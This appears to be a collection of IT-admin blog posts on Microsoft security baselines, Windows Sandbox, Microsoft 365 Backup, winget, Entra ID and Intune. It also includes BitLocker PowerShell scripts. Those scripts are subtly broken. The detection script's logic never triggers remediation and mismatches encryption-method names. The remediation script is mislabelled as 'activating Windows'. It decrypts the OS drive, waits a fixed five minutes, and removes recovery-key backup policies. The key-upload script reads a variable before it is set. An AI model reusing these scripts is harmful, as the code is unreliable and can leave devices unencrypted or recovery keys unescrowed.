(Microsoft Defender for Endpoint Security Baseline) (Microsoft Defender for Endpoint Security Baseline)"">

The Microsoft Defender for Endpoint baseline is specifically designed to optimize the settings within the Defender for Endpoint suite. It focuses on enhancing endpoint detection and response (EDR) capabilities, threat protection, and investigation tools.

Core Components of the Microsoft Defender for Endpoint Baseline

The baseline typically covers these key areas:

Real-time Protection:
- Configuration of real-time protection features like file system protection, network protection, and behavioral monitoring.
- Fine-tuning sensitivity levels for optimal threat detection.
Cloud Protection:
- Enabling cloud-based protection services for enhanced threat detection and response capabilities.
- Configuring cloud sandbox analysis and submission settings.
Investigation and Remediation:
- Enabling advanced hunting capabilities for proactive threat hunting.
- Configuring incident response and remediation workflows.
Endpoint Detection and Response (EDR):
- Optimizing EDR features for efficient threat investigation and response.
- Configuring attack surface reduction rules.
Threat Intelligence:
- Leveraging threat intelligence feeds for improved threat detection and prevention.
- Configuring integration with threat intelligence platforms.

Delving Deeper into the Microsoft Edge Security Baseline
(Security Baseline for Microsoft Edge) (Security Baseline for Microsoft Edge)"">

The Microsoft Edge security baseline is designed to enhance the security posture of the Microsoft Edge browser. It covers a wide range of settings, from security features to privacy options and performance optimization.

Key Components of the Microsoft Edge Security Baseline

Security Features:
- SmartScreen filter configuration: To protect against phishing and malicious downloads.
- Site isolation: To prevent one compromised website from affecting others.
- Cookies and site data management: To control cookie behavior and data storage.
- Password manager settings: To enforce strong password practices.
- Extensions management: To control the installation and usage of browser extensions.
Privacy Settings:
- Tracking prevention: To limit tracking by websites.
- Address bar suggestions: To control suggestions based on browsing history.
- Data collection and usage: To manage data collection by Microsoft.
Performance and Stability:
- Startup settings: To optimize browser startup performance.
- Hardware acceleration: To enable or disable hardware acceleration for graphics.
- Compatibility mode: To control compatibility settings for websites.

Delving Deeper into the Windows 365 Security Baseline
(Windows 365 Security Baseline) (Windows 365 Security Baseline)"">

The Windows 365 security baseline is a relatively new addition to the Intune suite, specifically designed to secure cloud-based Windows desktops. It builds upon the existing Windows 10, Microsoft Edge, and Microsoft Defender for Endpoint baselines, tailoring them for the unique characteristics of the Windows 365 environment.

Key Components of the Windows 365 Security Baseline

Given its nature as a cloud-based service, the Windows 365 security baseline focuses on:

Operating System Security:
- Account Policies: Enforces password policies, account lockout policies, and Kerberos settings.
- Audit Policies: Configures auditing for account logon events, object access, and policy change.
- User Rights Assignments: Defines which users or groups have specific rights, such as logging on locally or accessing the computer from the network.
Microsoft Edge Security:
- Privacy Settings: Controls for tracking prevention, cookie management, and site permissions.
- Security Settings: Configures SmartScreen, sandboxing, and other browser security features.
- Performance Settings: Optimizes browser performance while maintaining security.
Microsoft Defender for Endpoint:
- Antivirus Configuration: Settings for real-time protection, cloud-delivered protection, and automatic sample submission.
- Firewall Rules: Defines inbound and outbound rules to control network traffic.
- Attack Surface Reduction: Configures rules to reduce the attack surface, such as blocking executable content from email and webmail clients.

Delving Deeper into the Microsoft 365 Apps Security Baseline
(Microsoft 365 Apps for Enterprise Security Baseline) (Microsoft 365 Apps for Enterprise Security Baseline)"">

The Microsoft 365 Apps security baseline focuses on enhancing the security of Microsoft Office applications like Word, Excel, PowerPoint, Outlook, and others. It covers a broad range of security settings to protect documents, data, and user privacy.

Key Components of the Microsoft 365 Apps Security Baseline

Macro Security:
- Controlling macro execution to prevent malicious macros from running.
- Configuring trusted document locations.
Document Protection:
- Enabling document protection features like Information Rights Management (IRM).
- Configuring sensitive information types.
Application Settings:
- Disabling unnecessary features or add-ins.
- Configuring default application settings for security and privacy.
Email Security:
- Implementing email security settings in Outlook (e.g., phishing protection, junk email filtering).
- Configuring email encryption and digital signatures.

Best Practices

Phased Implementation: Deploy the baseline in stages to minimize disruption.
Pilot Testing: Test the baseline in a pilot group to identify potential issues.
User Impact: Consider the potential impact of changes on user productivity and experience.

By carefully implementing and managing the Windows Security Baseline, organizations can significantly enhance their device security posture and protect against a wide range of threats.

Links

Microsoft Learn Article

Example: Intune-ACSC-Windows-Hardening-Guidelines

Windows Sandbox automation | Powershell

Wed, 18 Sep 2024 20:26:16 GMT

Windows Sandbox automation scripts

What is Windows Sandbox?

Windows Sandbox is a secure, isolated environment (VM) on Windows Pro and Enterprise. It creates a temporary, disposable instance of Windows, ensuring any changes made do not affect the host system.

Key Points

Isolation: Each session is a fresh, clean slate.
Efficiency: Uses the host's OS image, minimizing overhead.
Disposable: All data is deleted when closed.

Windows Sandbox is perfect for testing software and exploring suspicious files without risk.

Install Windows Sandbox

INFO

An elevated Powershell instance is needed.

powershell

# Checks if the Windows Sandbox is alreaddy installed and if not, install it. 
If (!(Get-WindowsOptionalFeature -Online -FeatureName Containers-DisposableClientVM)){
    Enable-WindowsOptionalFeature -Online -FeatureName Containers-DisposableClientVM
}

Winget Configuration with Windows Sandbox

To use Windows Sandbox with Winget, you first need a configuration file in .yaml format. To do this, you can simply create a text file and change the file extension to .yaml afterwards.

yaml

# yaml-language-server: $schema=https://aka.ms/configuration-dsc-schema/0.2

###############################################################################
# Create Windows Sandbox instance with WinGet installed.                      #
# Run as Administrator                                                        #
# Mount C:\Sandbox on the local filesystem into the Sandbox filesystem.       #
# The Logon command performs the following steps in Windows PowerShell:       #
# 1. Set the execution policy to RemoteSigned                                 #
# 2. Download and install App Installer (WinGet) and it's dependencies        #
############################################################################### 

properties:
  resources:
    - resource: Microsoft.WindowsSandbox.DSC/WindowsSandbox
      directives:
        description: Create Windows Sandbox with Winget installed
        allowPrerelease: true
      settings:
        Ensure: Present
        # You could also provide a custom .wsb file to open (look at the next point further down) with the Windows Sandbox,
        # but the following parameters will override the values from it.
        # WsbFile: <Provide a custom .wsb file to open.>
        
        # The Logon command is in essence a powershell  script that will be executed when the sandbox is started. First it installs the Windows package manager.
        LogonCommand: >
          cmd /c start powershell -NoExit -Command "$progressPreference = 'silentlyContinue';
          Write-Host 'Setting execution policy to remote signed...' `n;
          Set-ExecutionPolicy RemoteSigned -Force;
          Write-Host 'Downloading WinGet and its dependencies...' `n;
          Invoke-WebRequest -Uri https://aka.ms/getwinget -OutFile Microsoft.DesktopAppInstaller_8wekyb3d8bbwe.msixbundle;
          Invoke-WebRequest -Uri https://aka.ms/Microsoft.VCLibs.x64.14.00.Desktop.appx -OutFile Microsoft.VCLibs.x64.14.00.Desktop.appx;
          Invoke-WebRequest -Uri https://github.com/microsoft/microsoft-ui-xaml/releases/download/v2.8.6/Microsoft.UI.Xaml.2.8.x64.appx -OutFile Microsoft.UI.Xaml.2.8.x64.appx;
          Add-AppxPackage Microsoft.VCLibs.x64.14.00.Desktop.appx;
          Add-AppxPackage Microsoft.UI.Xaml.2.8.x64.appx;
          Add-AppxPackage Microsoft.DesktopAppInstaller_8wekyb3d8bbwe.msixbundle;
        # From here on out you can use winget to install apps in the sandbox.
          winget install notepad++.notepad++ --accept-package-agreements --accept-source-agreements;
        # HostFolder: <Absolute path to folder on host machine that will be shared into the Windows Sandbox>
        # SandboxFolder: <Absolute path to destination in the sandbox to map the Host Folder to>
        # ReadOnly: false
        MemoryInMB: 4096
        vGPU: true
        # AudioInput: true
        # ClipboardRedirection: true
        Networking: true
        # PrinterRedirection: false
        # ProtectedClient: false
        # VideoInput: true
  configurationVersion: 0.2.0

After you safted the .yaml file on your computer, you can start the Windows Sandbox with the following command:

powershell

# Use Winget to start and configure the Windows sandbox.
winget configure C:\[FileName].yaml --accept-configuration-agreements

TIP

Microsoft hosts a link to a configuration file that can be used to configure the Windows Sandbox with Winget installed. winget configure. https://aka.ms/sandbox.dsc.yaml

Powershell window when starting the sandbox like shown above:

INFO

When you remove the '--accept-configuration-agreements' part from the command, you get the question at the end that you need to answer, like shown in the screenshot.

Windows Sandbox configuration with a .wsb file

You can also configure the Windows Sandbox with a .wsb file. The advantage is, that you can just double click the .wsb file to start the Windows Sandbox. This means you don`t need to use powershell in any way and can deploy the file to other users.

To create such a file, you can again simply write your configuration into a text editor and change the file extention afterwards to .wsb.

This example

disables the vGPU
enables Networking
Maps a local folder 'C:\TestReadFolder' as read only to the Windows Sandbox folder 'TestReadFolder' under Documents.
Maps a local folder 'C:\TestReadWriteFolder' to the Windows Sandbox folder 'TestReadWriteFolder' under Documents.
Downloads vsCode to Downloads and installs it.

xml

<Configuration>
  <vGpu>Disable</vGpu>
  <Networking>enable</Networking>
  <MappedFolders>
    <MappedFolder>
      <HostFolder>C:\TestReadFolder</HostFolder>
      <SandboxFolder>C:\Users\WDAGUtilityAccount\Documents\TestReadFolder</SandboxFolder>
      <ReadOnly>true</ReadOnly>
    </MappedFolder>
    <MappedFolder>
      <HostFolder>C:\TestReadWriteFolder</HostFolder>
      <SandboxFolder>C:\Users\WDAGUtilityAccount\Documents\TestWriteFolder</SandboxFolder>
      <ReadOnly>false</ReadOnly>
    </MappedFolder>
  </MappedFolders>
  <LogonCommand>
    <Command>powershell.exe "invoke-webrequest https://update.code.visualstudio.com/latest/win32-x64-user/stable" -outfile C:\users\WDAGUtilityAccount\Downloads\vscode.exe
    C:\users\WDAGUtilityAccount\Downloads\vscode.exe /verysilent /suppressmsgboxes</Command>
  </LogonCommand>
</Configuration>

Microsoft 365 Backup | Microsoft 365

Wed, 28 Aug 2024 20:25:29 GMT

Microsoft 365 Backup

Description

Microsoft 365 Backup is designed to ensure your organization's data is always protected and easily recoverable. It provides comprehensive coverage by backing up all or selected SharePoint sites, OneDrive accounts, and Exchange mailboxes. This service allows for fast backups and restores, ensuring business continuity by quickly recovering data in case of accidental or malicious deletion. Additionally, it integrates with the Microsoft 365 admin center and partner applications for streamlined management.

Things to know

🔄 Backup & Restore: Quickly back up SharePoint, OneDrive, and Exchange mailboxes.
⚙️ Configuration Control: Customize which data to back up with easy configuration options.
💰 The list price is $0.15/GB/month of protected content.
🚀 Speed and Efficiency: Microsoft 365 Backup guarantees rapid backups and restores.
🛡️ Immutable Backups: Backups are read-only, protecting against data loss or cyberattacks.
📅 Fixed Schedule: Regular backups every 15 minutes for SharePoint and OneDrive; every 10 minutes for Exchange.
📊 Retention Policies: Backups are retained for one year.
🔍 Role-Based Access: Different admin roles allow for specific backup and restore capabilities.
🗂️ Restore Options: Restore to original location or new URL/folder, enhancing flexibility.
🌐 Data Sovereignty: Data remains within the Microsoft 365 boundary, ensuring compliance and security.

What’s counted towards protected backup storage?

Microsoft 365 Backup charges you based on the size of the following content for 365 days from the time it's added to backup protection:

The total size of backed up mailboxes, SharePoint sites, and OneDrive accounts. OneDrive and SharePoint site sizes are based on their usage reports. Mailbox sizes include the user's mailbox, online archives, and deleted items.
Deleted content in user’s Recycle Bin and second-stage Recycle Bin (also known as Site Collection Recycle Bin).

INFO

Restore points or size of restores will not be charged. Although Azure is being used to process the payments, there are no additional Azure API or storage costs beyond the Microsoft 365 Backup usage charges previously mentioned.

For example, if you have a site under protection that is currently 1 GB, you are charged 1 GB of backup usage. If you delete content from a site, your next monthly bill will still be for 1 GB. This is because the backup tool retains deleted content for a year. After a year, the 0.5 GB of retained content will no longer be charged for backup.

Microsoft 365 Backup pricing calculator tool

Restoration Performance

Restoration performance depends on how quickly you want to recover from data loss. For full OneDrive and SharePoint restores, choose in-place rather than new URL restore. For quickest results, use one of the recommended express restore points.

All restores are fast, but same URL restores using a recommended express restore point will yield better results. The Exchange Online restore workflow doesn't have or require the "faster" restore points.

The following table summarizes expected performance for a normally distributed tenant, including tenants of large size and scale.

Protection units	OneDrive and SharePoint	Exchange Online
1	30 minutes	2 hours
50	3 hours	2.5 hours
250	4 hours	3 hours
1,000	10 hours	4 hours
More than 1,000	250/hour Up to 3 TB/hour	250+/hour Up to 2.7 TB/hour

*Single protection unit OneDrive and SharePoint restores using express restore points can take on average between 10 minutes and 120 minutes.

Feature summary

Feature	OneDrive	SharePoint	Exchange Online
Retention period	1 year	1 year	1 year
Recovery points	every 10 minutes for two weeks Weekly snapshots for weeks 2-52	every 10 minutes two weeks Weekly snapshots for weeks 2-52	every 10 minutes for 52 weeks
Backup granularity	OneDrive account	SharePoint site	Exchange user account
Restore granularity	OneDrive accounts Files restorable via versions (coming soon)	Sharepoints sites Files restorable via versions (coming soon)	Mail/Contacts/Calendar/Task items
Restore options	Location: Same or new URL OneDrive restore rolls back to the state of the site at the prior point in time, overwriting all content and metadata since that prior point in time File version restore rolls forward the file to the state at the prior point in time, but retains prior versions	Location: Same or new URL Full site restore rolls back to the state of the site at the prior point in time, overwriting all content and metadata since that prior point in time File version restore rolls forward the file to the state at the prior point in time, but retains prior versions	Location: Same or new folder within user’s mailbox Full and item level mailbox restores only modified/deleted items from prior point in time
Restore speeds (RTO)	Up to 1,000 average-sized OneDrive accounts at a rate of up to 1-3 TB per hour	Up to 1,000 average-sized sites, at a rate of up to 1-3 TB per hour	Up to 1,000 average-sized mailboxes at a rate of up to 1-3 TB per hour
Auditability	Actions fully auditable	Actions fully auditable	Actions fully auditable
Geographic residency	Physically redundant & geographically replicated Honors tenant’s geographic residency requirements	Physically redundant & geographically replicated Honors tenant’s geographic residency requirements	Physically redundant & geographically replicated Honors tenant’s geographic residency requirements
Billing model	$0.15 per GB per month for all data protected by Backup Restores are free	$0.15 per GB per month for all data protected by Backup Restores are free	$0.15 per GB per month for all data protected by Backup Restores are free

How to set up Microsoft 365 Backup

Open the Microsoft 365 admin center, open 'Settings' -> 'Org settings' and select 'Syntex'.
- If you don`t see 'Syntex' under 'Org settings' you can search for 'syntex' under 'Setup' and select 'Automate content processes with Syntex'.
- Now you can select 'Go to Syntex settings'.

Now you can select 'Storage' and open 'Backup'.

You will now be informed that you need to create a billing account for Syntex.
For that click on 'Set up billing'.

Next you can select the Azure subscription, the Resource group and the Region you want to use.
Accept the terms of service and 'save'.

This will only take a few seconds and when its done you will see a green message at the top that it was set up successfully.

Now you go back to the Microsoft Syntex settings and select 'Storage' -> 'Backup' again.
Here you you can turn on Microsoft 365 Backup in you Tenant.

INFO

This will not cost any money yet.

This will take about a Minute and then you will again see a green message at the top, that it was turned on.

Now you start setting the specific things you want to backup.
For this, please open 'Settings' in the left pane and click on 'Microsoft 365 Backup'.

In the next screen you see your tabs for 'Backup policies' and 'Restoration'.
Under 'Backup policies' you can set up the Backup for Sharepoint, Exchange and OneDrive.

WARNING

From here on out it will cost money for at least one year. (see info above)

For this click on 'Set up policy'.

INFO

The example is for an Exchange Mailbox, but the procedure is the same with the other services.

Next a wizard opens that guides you trough the process.

Here you can choose which items are included in the Backup via:
1. An .csv file upload. (You can download a template in the next screen.)
2. Specific filter critieria.
3. Select the items individually.

In this example I selected an individual mailbox.

Now proceed with clicking 'Create Policy'.

Now you see the status 'Processing' under the configured policy, which will take about an hour depending on the mass of selected items.

When its done, the Status switches to 'Active'.

How to Restore items form Microsoft 365 Backup

Open the Microsoft 365 admin center, open 'Settings' -> 'Microsoft 365 Backup' and select the 'Restorations' tab.
Here you can create a new Restore Task by selecting 'New Task'.

This starts a wizard to guide you through the task creation.
First you can select what content you want to restore.

INFO

In this example I will restore a few e-mails, but the procedure is the same with every other service.

Next you can choose how to select the items you want to create a restore for via:
1. An .csv file upload. (You can download a template in the next screen.)
2. Select the items individually.

In the following screen you can select the Mailboxes or upload the .csv template.

Next you can select if you want to restore the whole item, or stecific content.

In this example I restore all content from the past 24 hours with the keyword 'reminder' in the subject.
Please be aware, that the system first needs to search for the selected items, before you can proceed. (In this example, 4 items.)

Now I can decide if I want to restore in place or restore to another Folder.

Then a short Overview over the selected options follows and you can start the task.

Then a the Task starts, which can take a few seconds or a few minutes, depending on the amount you selected.
When the Task is initiated you will see the following screen, with a green checkmark and the notice that the restoration started.

When you now go back to the overview, you can see the ongoing task marked with 'in progress' and when completed with 'completed'.

When you selected to restore to a separate folder like in this example, the system creates a new folder with the date and time of the restore like shown in the screenshot below.

BitLocker | Powershell

Wed, 28 Aug 2024 20:25:29 GMT

BitLocker powershell

Drive encryption and Entra ID upload

powershell

<#  
    .NOTES
    -------------------------------------------------
     Created on:    22.07.2024
     Created by:    Michael Frank
     Organization:  [Company]
     Filename:      [File].ps1
     Updated on:    22.07.2024
     Version:       1.0.0
    -------------------------------------------------

    .DESCRIPTION
        This script checks every fixed drive for encryption, encrypts them if not encrypted and uploads the keys to Entra.
#>

# Gets fixed drives with no label so to not get Google Drives for example
$drives = [System.IO.DriveInfo]::GetDrives() | Where-Object { $_.DriveType -eq "Fixed" -and $_.VolumeLabel -eq "" } | Select-Object Name, DriveType, VolumeLabel, TotalSize, AvailableFreeSpace

# Loops through all drives and checks if they are encrypted
foreach($drive in $drives) {
    $bit = Get-BitLockerVolume -mountpoint $drive.name
    If (!$bit){

        # Encrypts the drive with BitLocker
        Enable-BitLocker -MountPoint $drive.name -EncryptionMethod Aes256 -RecoveryKeyProtector
    }

    # Uploads the recovery key to Entra ID
    $recoveryPasswordProtector = $bit.KeyProtector | Where-Object { $_.KeyProtectorType -eq 'RecoveryPassword' }
    BackupToAAD-BitLockerKeyProtector -MountPoint $drive.name -KeyProtectorId $recoveryPasswordProtector.KeyProtectorId
}

Encryption strenght remediation

This is a Remediation script for the BitLocker encryption strength. If your Systems are encrypted with AES 128 bit encryption or not encrypted at all, this script will remediate them to AES 256 bit encryption. This sometimes happen if you bye from huge vendors like HP or Dell. You Still need to upload the recovery key to Entra ID or AD after this.

Detection

powershell

<#  
    .NOTES
    -------------------------------------------------
     Created on:    27.07.2024
     Created by:    Michael Frank
     Organization:  [Company]
     Filename:      aes256_encryption_detection.ps1
     Updated on:    27.07.2024
     Version:       1.0.0
    -------------------------------------------------

    .DESCRIPTION
        Script checks if OS disk has AES 256 bit encryption.
#>

# Gets OS drive
$osdrive = get-bitlockervolume | Where-Object { $_.ProtectionStatus -eq "On" -and $_.VolumeType -eq "operatingSystem" } | Select-Object MountPoint, EncryptionMethod

if (-not $osdrive.EncryptionMethod -eq "XtsAes256") {
#Remediation runs
    exit 1
} else {
#Remediation does not run
    exit 0
}

Remediation

powershell

<#  
    .NOTES
    -------------------------------------------------
     Created on:    27.07.2024
     Created by:    Michael Frank
     Organization:  [Company]
     Filename:      aes256_encryption_remediation.ps1
     Updated on:    27.07.2024
     Version:       1.0.0
    -------------------------------------------------

    .DESCRIPTION
        Script activates Windows OS.
#>

# Gets OS drive
$osdrive = get-bitlockervolume | Where-Object { $_.ProtectionStatus -eq "On" -and $_.VolumeType -eq "operatingSystem" }

# Checks if BitLocker is even on and if so, disables it
if ($osdrive.ProtectionStatus -eq "On") {
  # If the volume that hosts the operating system contains any automatic unlocking keys, the cmdlet does not proceed. Clear-BitLockerAutoUnlock cmdlet removes all automatic unlocking keys.
  Clear-BitLockerAutoUnlock
  
  # Decrypt OS Drive
  Disable-BitLocker -MountPoint $osdrive.MountPoint
  
  #Sleep to give time for BitLocker to disable
  Start-Sleep -Seconds 300

  # Removes these 2 BitLocker policies, so that the next time the system starts, the system doesnt prompt for a password and it doesnt get loaded to AD.
  Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\FVE" -Name "OSRecoveryPassword"
  Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\FVE" -Name "OSRequireActiveDirectoryBackup"
}
else {
  # If BitLocker is not active yet, the $osdrive has no value and the next command would fail.
  $osdrive = [PSCustomObject]@{
    MountPoint = "C:"
  }
}

# Enable BitLocker again with the higher encryption only on used space (Encryption will start only after a restart).
Enable-BitLocker -MountPoint $osdrive.MountPoint -EncryptionMethod Aes256 -TpmProtector -UsedSpaceOnly

$osdrive = get-bitlockervolume | Where-Object { $_.VolumeType -eq "operatingSystem" }

if ($osdrive.EncryptionMethod -eq "Aes256") {
    # success
    Write-Host "Windows has been activated successfully." -ForegroundColor Green
    exit 0
}
else {
    # failed
    exit 1
}
    ```

Windows Package Manager | Powershell

Wed, 31 Jul 2024 20:03:37 GMT

Windows Package Manager (Winget)

What is Winget?

Winget is a Windows native open source package manager created by Microsoft. It is very similar in principle to chocolatey and other package managers. The difference is that it was created by Mircrosoft and is therefore natively integrated into Windows operating systems. It lacks certain quality of life and management features that other solutions have, but it is still at the beginning of its journey. With the backing of Microsoft and already an integral part of the Intune App delivery, it is only a matter of time before it catches up with its peers.

Basic Information

Winget standard has two sources.

Winget public repository (winget)
Windows Store (msstore)

In Addition you can install Windows features with winget and host your own private repository on Azure. This can be done for a few Euros per month (if using SQL tier demo).

Apps in the Winget public repository are need to pass the same security measures that the Windows Store Apps need to pass.

App information

Winget apps are structured like myApp.myApp (for example Notepad++.Notepad++)
Winget can install windows store apps like (for example 9MSMLRH6LZF3 = Windows Notepad)

Basic commands

Show winget commands

powershell

winget -?

Search for a programm in all sources

powershell

winget search [App Name]

List installed programs

powershell

winget list [App Name]

Install program

powershell

winget install [App Name]

Uninstall program

powershell

winget uninstall [App Name]

Update program

powershell

winget update [App Name]

Download Microsoft Store App Installer

powershell

# Download Installer
winget download [App Name] -s msstore

# Install Installer
Add-AppxPackage -Path C:\Users\[Username]\downloads\[AppIdentifier]\[App Name].appx

Microsoft Entra ID

Sun, 28 Jul 2024 16:26:29 GMT

Microsoft EntraID

INFO

formally known as 'Azure Active Directory'

What is it?

A cloud-based Identity and Access Management (IAM) service that offers comprehensive user, application, and device management.

Key Features

Identity Management
- Stores user and group information including credentials.
- Can integrate with on-premises Active Directory for hybrid environments.
- Supports user lifecycle management including self-service password reset.
Access Management
- Role-Based Access Control (RBAC) allows granular control over application and resource access based on user roles.
- Conditional Access policies enforce additional security measures like MFA based on factors like device type, location, or application risk.
Multi-factor Authentication (MFA) Integrates with various MFA providers for strong authentication beyond just passwords.
Single Sign-On (SSO) Enables users to seamlessly access authorized applications with a single login.
Application Management
- Supports integration with various Microsoft and third-party SaaS applications.
- Provides tools for provisioning, de-provisioning, and managing application access for users.
Security
- Built on Azure's security infrastructure with features like intrusion detection and threat protection.
- Supports security standards like SOC 2 and GDPR compliance.
Automation and extensibility
- Supports automation through PowerShell and Graph API for managing identities and access.
- Integrates with Security Information and Event Management (SIEM) tools for centralized logging and monitoring.

Benefits for IT Professionals

Centralized Management Simplifies user, application, and device administration from a single platform.
Enhanced Security Enforces strong authentication and access controls to mitigate security risks.
Improved Productivity Streamlines user access with SSO and reduces password fatigue.
Scalability Cloud-based nature allows for easy scaling to accommodate growing user bases and application needs.
Compliance Supports compliance with various industry regulations and data privacy standards.

Considerations

Cost Entra ID offers various tiers with different feature sets, impacting cost.
Integration Complexity Integrating with complex on-premises environments or legacy applications might require additional effort.

Overall, Microsoft Entra ID is a robust IAM solution offering a secure and centralized approach to managing user identities and application access in the cloud. However, it's important to weigh the feature set, cost, and potential integration challenges against your specific needs.

Global Secure Access | Entra ID

Sun, 28 Jul 2024 16:26:29 GMT

Global Secure Access

Introduction

Microsoft EntraID Global Secure Access is a unified approach to securing access to both public cloud applications (like Microsoft 365) and private company resources. It aims to simplify access management while using zero-trust principles to keep your data and devices safe.

Microsoft Entra Internet Access (Microsoft 365 acess): This secures connections to public cloud services like Microsoft 365 and the internet, protecting users and data from online threats.
Microsoft Entra Private Access: This offers a secure way to reach your company's internal resources, replacing traditional VPNs. It doesn't require complex setups and grants access based on user permissions, enhancing security.

Overall, Global Secure Access aims to streamline access management for admins and provide a safe, zero-trust approach for users to reach all their work resources, regardless of location or device.

WARNING

Be aware that this is a preview feature and not all features are available yet.

Implementation

Open https://entra.microsoft.com
Navigate to 'Global Secure Access'
Under 'Connect' you now find 'Traffic forwarding'

Here you find the three traffic forwarding profiles, that when activated will send the traffic from your devices via the Microsoft Edge (Azure) to its destination.
For every profile you have the possibility to determine the users & groups that the profile should apply to and the network in which the policy should be used. That means, your devices don`t need to send traffic trough the microsoft edge if you are already in your company network for example.

INFO

Every traffic forwarding profile uses the same client.

To facilitate that you need to install a client on every computer.
The client download is located under 'Connect' -> 'Client download'

INFO

The client doensn`t need any more settings, only a log in.

Microsoft 365 traffic

Activating this profile will send all Microsoft 365 traffic with predetermined policies securely between the device and the Microsoft 365 Service.

Internet Access

Activating this profile will filter the Web traffic over Ports 80 and 443, sending trough the Mirosoft service.

The traffic flows like this:

Start: User/Device initiates web traffic request.
Step 1: Identity & Device Verification
- Traffic flows to the Microsoft Entra Internet Access service.
- Entra Internet Access checks the user or device against the Entra ID directory.
- This verifies the user's identity and retrieves any relevant access policies.
Step 2: Conditional Access Policy Evaluation
- Based on the user/device information from Step 1, Entra Internet Access evaluates pre-configured Conditional Access policies.
Step 3: Web Content Filtering
- The requested web address is checked against a web filtering list.
- This list can block malicious or inappropriate websites by category or specific domain.
Step 4: Secure Connection
- Entra Internet Access establishes a secure connection to the requested website.
- This helps protect user traffic from eavesdropping or manipulation.
Step 5: Deliver Web Content
- The requested web content is delivered to the user's device.
- Securely and with any necessary access controls enforced.

Configuration

In the Entra ID dashboard open 'Global Secure Access -> Secure -> Web content filtering policies'.

Here you can create new web content filtering policies to block or allow websites.

In the next screen you can now add filter rules for you policy.
Click 'Add Rule' and choose from pre-build Microsoft webcategories or add a specific FQDN.

Next you save that rule and that policy and open in the left menu 'Security profiles'.
On this screen you find two tabs. 'Security profiles' and 'Baseline profiles'.
'Baseline profiles' is the standard configuration Microsoft pre-configured and comes from the angle that every site is allowed and you block the categories and individual sites you don`t want accessed. This of course can be reversed, by changing the baseline to block and making 'allow' rules for the things you specifically want to access.

Under the tab 'Security profiles' you can create the profiles that you can then link to the overarching 'Internet Access' profile.

Click 'Create profile' enter your Name, discription, priority and click 'Next'.

Now you can link the web content filtering policy we created before or directly create a new one.

INFO

The priorities you are assigning to the profiles and linked policies are important. The lower the priority number, the higher the priority of the rule. In Addition you can`t give a profile or a linked policy the priority 65000. That priority is reserved for the Microsoft baseline.

Details

Microsoft Intune

Sun, 28 Jul 2024 16:26:29 GMT

Why you should use Intune?

What actually Is Microsoft Intune (TLDR)?

Microsoft Intune is like the Swiss Army knife of device management. It's a cloud-based (SaaS) service that allows organizations to efficiently manage their fleet of devices from a single console. Intune is cross-platform, so it can manage your Windows, MacOS, iOS, Android and Linux Devices. In addition Intune is super scalablem, no matter if you want to manage 10 or 10.000 Devices.

In fact, Intune is more than just an MDM, its a UEM (Unified Endpoint Management). That means that it`s managing alls aspects of your Endpoint needs. It`s not only capable of monitoring devices and pushing Policies,it is also the connection to the Microsoft Security Services (Defender for Endpoint) and there settings, distributes apps and manages parts of the access like certificates, conditional access or compliance.

But why Intune though?

Cloud-Based Management
Intune’s cloud-native architecture allows organizations to manage devices from anywhere, without the need for on-premises infrastructure. Dynamic provisioning simplifies device setup, transforming new devices into fully configured endpoints without reimaging.

Security and Compliance
Intune provides advanced security features, leveraging Microsoft Security signals to protect corporate data. It ensures compliance by enforcing policies and monitoring device health.

Cost-Effectiveness
By consolidating vendors and eliminating complex scripting, Intune reduces overall management costs. Its licensing model covers both Windows and non-Windows devices, making it a cost-effective choice. In Addition, it is included in most Microsoft 365 licences (not Office 365).

User Productivity
Intune enables modern provisioning through Windows Autopilot, enhancing end-user productivity. Centralized visibility allows IT teams to proactively address issues, minimizing disruptions.

Unified Management
Intune goes beyond just Windows. It's a cloud-based solution that lets you manage Windows PCs, Macs, Androids, and iOS devices all from a single, intuitive console. This eliminates the need for multiple tools and simplifies administration for your IT team.

Enhanced Security
Intune empowers you to configure robust security policies. You can enforce strong passwords, enable encryption, and restrict access to unauthorized apps. Additionally, Intune integrates with Microsoft EntraID, allowing you to manage user access and further strengthen your security posture.

Simplified Deployment and Updates
Gone are the days of manually installing software on every device. Intune lets you remotely deploy essential applications and security updates to your entire device fleet. This ensures everyone has the latest tools and protection, reducing security vulnerabilities.

Increased Productivity
Intune streamlines the user experience. With self-service options, employees can easily enroll their devices and access company resources. Additionally, Intune can pre-configure settings for new devices, minimizing setup time and getting everyone productive faster.

Scalability and Cost-Effectiveness
Intune is a cloud-based service, so you don't need to invest in additional hardware or software. It scales seamlessly as your company grows, eliminating the need to constantly upgrade your infrastructure. Plus, it's part of the Microsoft 365 ecosystem, potentially reducing licensing costs if you already use other Microsoft 365 products.

Return on Investment (ROI) example calculation for a 100 person businness wanting to adopt Intune in EUR and USD
(Note: In this example the business has no Intune license in use.)

Intune Value Calculator

Why pay an extra 10€ for the Intune Suite

Security & Management All-in-One
Intune Suite isn't just one tool, it's a bundled package. You get endpoint analytics, mobile application management, remote help, and cloud-based Public Key Infrastructure (PKI) – all for one price. This lets you check devices, manage apps, and control access with a single console. Imagine the cost and complexity of buying and managing separate solutions for each!

Reduced Complexity, Increased Efficiency
Managing multiple security and management tools can be a nightmare. Intune Suite simplifies things. With one seamless platform, your IT team can configure policies, deploy applications, and troubleshoot issues from a central location. This saves time, reduces errors, and frees up your IT staff to focus on other strategic initiatives.

Cost Savings Through Consolidation
While 10€ per User per Month may seem like a chunk of change, consider the alternative. Purchasing separate best-of-breed solutions for each function within Intune Suite can be significantly more expensive. Plus, there's the cost of managing multiple vendor contracts and training. Intune Suite streamlines licensing and simplifies administration, potentially leading to overall cost savings.

However, it's not a one-size-fits-all solution

Consider your needs: If you only need basic mobile device management, Intune Suite might be overkill. Evaluate your specific requirements before committing. All Intune Suite functions are also available separatly.
Explore alternatives: There are third-party solutions offering similar functionality. Research and compare pricing and features to see what best suits your needs.

Return on Investment (ROI) example calculation for a 1000 person businness wanting to adopt Intune Suite in EUR and USD
(Note: In this example the business has M365 E5 Licenses already in use.)

Intune Value Calculator

Ultimately, the 10 € price tag of the Intune Suite is the elefant in the room for many people, but it can be a great investment for businesses seeking a single pain of class cloud solution, user-friendly, and perfectly integrated into the Microsoft World that many business already use and many profesionals are familiar with. However, carefully assess if you can make use of the possibilites it brings or if a stagered approach / a single functionality is enough for you.

Active Directory | Powershell

Sun, 28 Jul 2024 16:26:29 GMT

Active Directory

List Computer-Objects with last logon time

powershell


